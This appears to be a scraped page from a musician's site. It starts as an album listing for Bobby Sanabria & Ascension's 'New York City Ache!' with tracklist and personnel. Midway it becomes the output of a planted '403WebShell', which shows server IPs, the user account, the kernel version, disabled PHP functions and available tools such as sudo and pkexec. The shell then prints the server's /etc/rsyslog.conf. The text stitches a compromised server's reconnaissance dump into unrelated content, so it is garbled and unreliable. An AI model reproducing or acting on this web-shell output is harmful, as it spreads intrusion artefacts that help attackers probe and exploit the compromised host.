Bobby Sanabria & Ascension
New York City Ache! Flying Fish Records
Tracklist
Elegba: Guardian of the Crossroads
Brindando El Son — Que Rico Es
El Saxofon y el Guaguanco
Plenas En Cadenas
Two Generations: Part I
Introduction: Llegue
Llegue (I’ve Arrived)
Delirio
Do You Know?
La Cumbiamba
Caribbean Fire Dance
Two Generations: Parts II & III
Adios, Mario
Personnel
Special Guests:
Tito Puente and Paquito D’Rivera
Musicians:
Bobby Sanabria – Drums, Timbales, Timbalitos, Vibes, Congas, Bongo and Cencerro, Panderatas, Claves, Shekeres, Guataca, Achere, Bkgd. Vocals
Eddie Rodriguez – Congas, Bkgd. Vocals, Iya Bata Drum
Eddie BobE- Congas, Bkgd.Vocals
Tatyana Calzado – Bkgd. Vocals
Horacio Jimenez – Bkgd. Vocals
Tito Puente – Timbales, Timbalitos
Donald Nicks – Electric and Acoustic Bass
Julio Virella – Electric Guitar
Oscar Hernandez – Acoustic Piano and Synthesizer
Gene Jefferson – 1st and 2nd Flutes, Alto Sax, Vocals
Paquito D’Rivera – Clarinet
Jay Rodriguez – Tenor and Soprano Saxophones
Barry Danielian – Trumpet
Hiram Remon – Lead Vocals, Guiro
John di Martino – Acoustic Piano
Lewis Kahn – Trombone, Violin
Maxwell Hyman – Spoken Word
403WebShell
403Webshell
Server IP : 23.235.221.107 / Your IP : 216.73.217.43 Web Server : Apache System : Linux drums.jazzcorner.com 4.18.0-513.24.1.el8_9.x86_64 #1 SMP Mon Apr 8 11:23:13 EDT 2024 x86_64 User : bsanabri ( 1025) PHP Version : 8.1.34 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /etc/
# rsyslog configuration file
# For more information see /usr/share/doc/rsyslog-*/rsyslog_conf.html
# or latest version online at http://www.rsyslog.com/doc/rsyslog_conf.html
# If you experience problems, see http://www.rsyslog.com/doc/troubleshoot.html
#### MODULES ####
module(load="imuxsock" # provides support for local system logging (e.g. via logger command)
SysSock.Use="off") # Turn off message reception via local log socket;
# local messages are retrieved through imjournal now.
module(load="imjournal" # provides access to the systemd journal
UsePid="system" # PID nummber is retrieved as the ID of the process the journal entry originates from
StateFile="imjournal.state") # File to store the position in the journal
#module(load="imklog") # reads kernel messages (the same are read from journald)
#module(load="immark") # provides --MARK-- message capability
# Provides UDP syslog reception
# for parameters see http://www.rsyslog.com/doc/imudp.html
#module(load="imudp") # needs to be done just once
#input(type="imudp" port="514")
# Provides TCP syslog reception
# for parameters see http://www.rsyslog.com/doc/imtcp.html
#module(load="imtcp") # needs to be done just once
#input(type="imtcp" port="514")
#### GLOBAL DIRECTIVES ####
# Where to place auxiliary files
global(workDirectory="/var/lib/rsyslog")
# Use default timestamp format
module(load="builtin:omfile" Template="RSYSLOG_TraditionalFileFormat")
# Include all config files in /etc/rsyslog.d/
include(file="/etc/rsyslog.d/*.conf" mode="optional")
#### RULES ####
# Log all kernel messages to the console.
# Logging much else clutters up the screen.
#kern.* /dev/console
# Log anything (except mail) of level info or higher.
# Don't log private authentication messages!
*.info;mail.none;authpriv.none;cron.none /var/log/messages
# The authpriv file has restricted access.
authpriv.* /var/log/secure
# Log all the mail messages in one place.
mail.* -/var/log/maillog
# Log cron stuff
cron.* /var/log/cron
# Everybody gets emergency messages
*.emerg :omusrmsg:*
# Save news errors of level crit and higher in a special file.
uucp,news.crit /var/log/spooler
# Save boot messages also to boot.log
local7.* /var/log/boot.log
# ### sample forwarding rule ###
#action(type="omfwd"
# An on-disk queue is created for this action. If the remote host is
# down, messages are spooled to disk and sent when it is up again.
#queue.filename="fwdRule1" # unique name prefix for spool files
#queue.maxdiskspace="1g" # 1gb space limit (use as much as possible)
#queue.saveonshutdown="on" # save messages to disk on shutdown
#queue.type="LinkedList" # run asynchronously
#action.resumeRetryCount="-1" # infinite retries if host is down
# Remote Logging (we use TCP for reliable delivery)
# remote_host is: name/ip, e.g. 192.168.0.1, port optional e.g. 10514
#Target="remote_host" Port="XXX" Protocol="tcp")